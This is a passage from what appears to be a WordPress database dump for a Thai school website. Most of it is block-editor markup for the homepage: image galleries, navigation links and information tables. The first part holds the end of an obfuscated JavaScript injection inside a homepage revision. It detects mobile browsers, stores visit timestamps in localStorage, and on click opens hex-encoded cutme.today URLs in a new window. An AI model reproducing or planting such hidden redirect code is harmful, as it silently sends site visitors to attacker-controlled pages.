)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-06-16 10:36:59','2025-06-16 03:36:59','',14,'http://pakhaeng.ssk.in.th/?p=1398',0,'revision','',0),
(1399,1,'2025-06-16 10:37:37','2025-06-16 03:37:37','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td>คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a 